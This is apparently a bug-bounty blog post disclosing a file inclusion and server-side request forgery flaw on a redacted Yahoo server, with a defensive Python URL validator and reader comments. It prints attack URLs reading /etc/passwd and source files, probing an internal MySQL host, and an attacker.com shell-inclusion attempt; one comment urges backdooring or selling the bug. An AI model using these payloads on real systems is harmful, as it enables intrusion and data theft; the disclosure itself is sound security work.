Yahoo! Escalated Remote File Inclusion Vulnerability.


Hello Everyone 🙂

Today’s article is split into two main parts:

1- How I found the Yahoo LFD/RFI (Local File Disclosure/Remote File Inclusion) vulnerability

2- Exploitation Techniques

#Important Note: Yahoo! asked that the domain name and some other details be removed from this write-up before publication. The video PoC has also been removed so as not to disclose the affected hostname.


1- How I found the Yahoo LFD/RFI (Local File Disclosure/Remote File Inclusion) vulnerability

As you know, it all starts with information gathering. After collecting some Yahoo sub-domains, I started working on:
https://x.x.yahoo.net

After some file/directory name brute-forcing, the following page was found:

https://x.x.yahoo.net/mod/test.php


Viewing the page source, the following page caught my attention:


As you can see, images are loaded from a remote URL via a parameter named “img_url”.

By tampering with the “img_url” parameter, I found that I could include remote files, not only image files!

2- Exploitation Techniques

NOTE: all payloads were tested against “x.x.x.yahoo.net”, which is a redundant/secondary server and not the main site, to avoid detection and to avoid causing any issues in a Yahoo production environment during the test.

After finding the remote file inclusion vulnerability, I tried several techniques to gain shell access to the server, such as including “http://attacker.com/shell.txt?”. I also tried gaining shell access via LFI, such as log file injection and the well-known /proc/self/environ trick (References: Ref1, Ref2), with no luck at all.

It seems the server’s php.ini is well configured, or maybe it is all about how the backend code handles the requested URLs?

Time for LFD (Local File Disclosure) instead of RFI:

The first thing that comes to mind when thinking of LFI/LFD is PHP wrappers:


Although the PHP wrappers php://input, php://output, data://, ftp:// etc. didn’t work for me, fortunately two techniques did: the first uses the PHP wrapper file://, and the second uses the normal http:// protocol to reach internal hosts.

1- https://x.x.x.yahoo.net/mod/display_img.php?img_url=file:///etc/passwd

#file:// is the PHP wrapper for accessing the local filesystem.


By reading the /etc/hosts file, I now know that the internally used subnet is 192.168.100.0/24:

[Screenshot: contents of /etc/hosts]

As you can see from the above screenshot, the database server is hosted on 192.168.100.1/2/3/4, which was confirmed by a simple SSRF (Server Side Request Forgery). #Not to be confused with Cross Site Port Scanning (XSPS): this wasn’t port scanning but SSRF.

https://x.x.x.yahoo.net/mod/display_img.php?img_url=http://192.168.100.2:3306/

#3306/TCP is the default port of the MySQL database server.
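Both vectors above (the file:// wrapper at the PHP layer and the plain http:// request to an internal host) are stopped by validating img_url before anything is fetched. The following is an added example written for this write-up, not Yahoo’s code and not the original display_img.php (whose source the page never shows); it is in Python so it runs stand-alone, and the resolver is pluggable so the checks can be exercised offline.

```python
import ipaddress
import socket
from urllib.parse import urlparse

# Only plain web fetches are allowed: this alone rules out file://, php://,
# data:// and ftp://, the wrappers tried in the write-up.
ALLOWED_SCHEMES = {"http", "https"}
ALLOWED_PORTS = {80, 443}      # no 3306 (MySQL) or other service ports
# Magic bytes of the image formats the fetcher is willing to serve.
IMAGE_MAGIC = (b"\x89PNG\r\n\x1a\n", b"\xff\xd8\xff", b"GIF87a", b"GIF89a")

def resolve_all(host):
    """Default resolver: every IPv4 address of host (pluggable so tests run offline)."""
    return {info[4][0] for info in socket.getaddrinfo(host, None, socket.AF_INET)}

def check_img_url(url, resolve=resolve_all):
    """Return (ok, reason); ok is True only for an http(s) URL on a public host."""
    parts = urlparse(url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False, "scheme not allowed"
    if not parts.hostname:
        return False, "missing host"
    try:
        port = parts.port
    except ValueError:
        return False, "malformed port"
    if port is None:
        port = 443 if parts.scheme.lower() == "https" else 80
    if port not in ALLOWED_PORTS:
        return False, "port not allowed"
    try:  # an IP literal needs no DNS; anything else is resolved
        addrs = {str(ipaddress.ip_address(parts.hostname))}
    except ValueError:
        try:
            addrs = resolve(parts.hostname)
        except (socket.gaierror, UnicodeError):
            addrs = set()
    if not addrs:
        return False, "unresolvable host"
    for addr in addrs:
        # is_global is False for RFC 1918 (192.168.100.0/24 here), loopback, link-local, reserved
        if not ipaddress.ip_address(addr).is_global:
            return False, "host resolves to non-public address " + addr
    return True, "ok"

def looks_like_image(body):
    """Second line of defence: whatever came back must start like an image file."""
    return body.startswith(IMAGE_MAGIC)
```

The fetch itself should connect to the address that passed the check rather than re-resolve the name, so a DNS change between check and fetch cannot reopen the internal subnet, and any redirect must be re-checked the same way.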


Now let’s scan the internal subnet for live hosts. I wrote a simple Python script that sends a request to each IP; if a valid response comes back, the host is up and running a web server (this was repeated on other ports as well).

[Screenshot: live hosts found]

Brute-forcing file/directory names on an internally hosted server:

[Screenshot: brute-forcing results]

As a final step I read the Apache configuration file to find the path where the application is hosted:


The next step was to read some source code:

https://x.x.x.yahoo.net/mod/display_img.php?img_url=file:///home/httpd/httpd/class/db_class.php

[Screenshot: db_class.php source]


Although I was able to initiate requests to the Yahoo.com intranet, Yahoo still considers Yahoo.net out of scope.
Yahoo rewarded this critical finding with $250!!


5 Comments

  1. Muhammed bassem - December 9, 2016

    Congratulations on the bounty, good write-up by the way

  2. ahmad - December 18, 2016

    Assalamu alaykum, do you use your own script for brute-forcing the file/dir names?

  3. Maradona - February 2, 2017

    $250 only!!!! How much is it worth if it’s on the deep web???
    Tamam ya man . bsss next time backdoor it 😉 …. 3lshan al7rkaat al3raaa3 deee
